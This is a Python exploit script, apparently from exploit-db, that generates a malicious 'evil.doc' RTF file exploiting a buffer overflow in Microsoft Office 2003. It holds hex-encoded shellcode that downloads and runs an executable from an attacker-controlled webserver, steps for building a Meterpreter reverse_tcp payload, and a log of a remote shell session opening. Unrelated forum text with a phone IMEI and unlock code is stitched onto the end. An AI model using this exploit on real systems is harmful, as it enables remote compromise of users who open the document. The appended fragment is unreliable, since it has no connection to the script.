# https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/windows/fileformat/ms10_087_rtf_pfragments_bof.rb
#
#-----------------------------------------------------------------------------------#
# Exploit: Microsoft Office 2003 Home/Pro 0day - Tested on XP SP1,2.3 #
# Authors: b33f (Ruben Boonen) && g11tch (Chris Hodges) #
#####################################################################################
# One shellcode to rule them all, One shellcode to find them, One shellcode to #
# bring them all and in the darkness bind them!! #
# #
# Greetings: offsec, corelan, setoolkit #
#####################################################################################
# (1) root@bt:~/Desktop/office# ./office2003.py #
# root@bt:~/Desktop/office# mv evil.doc /var/www/ #
# #
# (2) msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.111.132 LPORT=9988 X #
# > /var/www/magic.exe #
# #
# (3) msf exploit(handler) > exploit #
# #
# [*] Started reverse handler on 192.168.111.132:9988 #
# [*] Starting the payload handler... #
# [*] Sending stage (752128 bytes) to 192.168.111.128 #
# [*] Meterpreter session 1 opened (192.168.111.132:9988 -> 192.168.111.128:1073)#
# at 2012-01-08 18:46:26 +0800 #
# #
# meterpreter > ipconfig #
# #
# MS TCP Loopback interface #
# Hardware MAC: 00:00:00:00:00:00 #
# IP Address : 127.0.0.1 #
# Netmask : 255.0.0.0 #
# #
# AMD PCNET Family PCI Ethernet Adapter - Packet Scheduler Miniport #
# Hardware MAC: 00:0c:29:6c:92:42 #
# IP Address : 192.168.111.128 #
# Netmask : 255.255.255.0 #
#-----------------------------------------------------------------------------------#
import binascii
filename = "evil.doc"
#-----------------------------------------------------------------------------------#
# File Structure #
#-----------------------------------------------------------------------------------#
file = (
"{\\rt##{\shp{\sp}}{\shp{\sp}}{\shp{\sp}}{\shp{\*\shpinst\shpfhdr0\shpbxcolumn\s"
"hpbypara\sh pwr2}{\sp{\sn {}{}{\sn}{\sn}{\*\*}pFragments}{\*\*\*}{\sv{\*\*\*\*\*"
"\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*}9;2;ffffffffff")
#-----------------------------------------------------------------------------------#
# Open raw socket to download payload to parent directory as "a.exe" #
# ==> cmd execute "a.exe" #
#-----------------------------------------------------------------------------------#
magic = (
"\x65\x62\x37\x37\x33\x31\x63\x39\x36\x34\x38\x62\x37\x31\x33\x30"
"\x38\x62\x37\x36\x30\x63\x38\x62\x37\x36\x31\x63\x38\x62\x35\x65"
"\x30\x38\x38\x62\x37\x65\x32\x30\x38\x62\x33\x36\x36\x36\x33\x39"
"\x34\x66\x31\x38\x37\x35\x66\x32\x63\x33\x36\x30\x38\x62\x36\x63"
"\x32\x34\x32\x34\x38\x62\x34\x35\x33\x63\x38\x62\x35\x34\x30\x35"
"\x37\x38\x30\x31\x65\x61\x38\x62\x34\x61\x31\x38\x38\x62\x35\x61"
"\x32\x30\x30\x31\x65\x62\x65\x33\x33\x34\x34\x39\x38\x62\x33\x34"
"\x38\x62\x30\x31\x65\x65\x33\x31\x66\x66\x33\x31\x63\x30\x66\x63"
"\x61\x63\x38\x34\x63\x30\x37\x34\x30\x37\x63\x31\x63\x66\x30\x64"
"\x30\x31\x63\x37\x65\x62\x66\x34\x33\x62\x37\x63\x32\x34\x32\x38"
"\x37\x35\x65\x31\x38\x62\x35\x61\x32\x34\x30\x31\x65\x62\x36\x36"
"\x38\x62\x30\x63\x34\x62\x38\x62\x35\x61\x31\x63\x30\x31\x65\x62"
"\x38\x62\x30\x34\x38\x62\x30\x31\x65\x38\x38\x39\x34\x34\x32\x34"
"\x31\x63\x36\x31\x63\x33\x65\x38\x39\x32\x66\x66\x66\x66\x66\x66"
"\x35\x66\x38\x31\x65\x66\x39\x38\x66\x66\x66\x66\x66\x66\x65\x62"
"\x30\x35\x65\x38\x65\x64\x66\x66\x66\x66\x66\x66\x36\x38\x38\x65"
"\x34\x65\x30\x65\x65\x63\x35\x33\x65\x38\x39\x34\x66\x66\x66\x66"
"\x66\x66\x33\x31\x63\x39\x36\x36\x62\x39\x36\x66\x36\x65\x35\x31"
"\x36\x38\x37\x35\x37\x32\x36\x63\x36\x64\x35\x34\x66\x66\x64\x30"
"\x36\x38\x33\x36\x31\x61\x32\x66\x37\x30\x35\x30\x65\x38\x37\x61"
"\x66\x66\x66\x66\x66\x66\x33\x31\x63\x39\x35\x31\x35\x31\x38\x64"
"\x33\x37\x38\x31\x63\x36\x65\x65\x66\x66\x66\x66\x66\x66\x38\x64"
"\x35\x36\x30\x63\x35\x32\x35\x37\x35\x31\x66\x66\x64\x30\x36\x38"
"\x39\x38\x66\x65\x38\x61\x30\x65\x35\x33\x65\x38\x35\x62\x66\x66"
"\x66\x66\x66\x66\x34\x31\x35\x31\x35\x36\x66\x66\x64\x30\x36\x38"
"\x37\x65\x64\x38\x65\x32\x37\x33\x35\x33\x65\x38\x34\x62\x66\x66"
"\x66\x66\x66\x66\x66\x66\x64\x30\x36\x33\x36\x64\x36\x34\x32\x65"
"\x36\x35\x37\x38\x36\x35\x32\x30\x32\x66\x36\x33\x32\x30\x32\x30"
"\x36\x31\x32\x65\x36\x35\x37\x38\x36\x35\x30\x30")
#------------------------------------------------------------------------------------------------------------------------------#
# Two versions of office 2003 floating around: #
# (1) Standalone version, (2) XP Service Pack upgrade #
################################################################################################################################
# Unfortunatly though the exploit works perfectly for both versions they require different pointers to ESP... #
# #
# (1) 0x30324366 - CALL ESP - WINWORD.exe => "\x36\x36\x34\x33\x33\x32\x33\x30" #
# => http://download.microsoft.com/download/6/2/3/6233A257-16BD-4C8D-BF4C-6FA59AF9213A/OfficeSTD.exe #
# #
# (2) 0x30402655 - PUSH ESP -> RETN - WINWORD.exe => "\x35\x35\x32\x36\x34\x30\x33\x30" #
# => http://download.microsoft.com/download/7/7/8/778493c2-ace3-44c5-8bc3-d102da80e0f6/Office2003SP3-KB923618-FullFile-ENU.exe #
#------------------------------------------------------------------------------------------------------------------------------#
EIP = "\x36\x36\x34\x33\x33\x32\x33\x30" #should ascii convert the Little Endian pointer
filler = "\x30\x30\x30\x30\x38\x30\x37\x63"*2 + "\x41"*24 + "\x39\x30"*18
buffer = "\x23"*501 + "\x30\x35" + "\x30"*40 + EIP + filler + magic
#-----------------------------------------------------------------------------------#
# Since we are downloading our payload from a remote webserver there are no #
# restrictions on payload size or badcharacters... #
#-----------------------------------------------------------------------------------#
URL = "http://192.168.111.132/magic.exe"
binnu = binascii.b2a_hex(URL)
URL2 = "00"
nxt="{}}}}}}"
nxt+="\x0d\x0a"
nxt+="}"
textfile = open(filename , 'w')
textfile.write(file+buffer+binnu+URL2+nxt)
textfile.close()source: exploit-db.com
-
nokia 5230 Navi S60 (RM-588)
IMEI 357900043362532
Incearca asta: #pw+4267324516 +1#
Seriale interesante ...
in Off-topic
Posted · Edited by The_Arhitect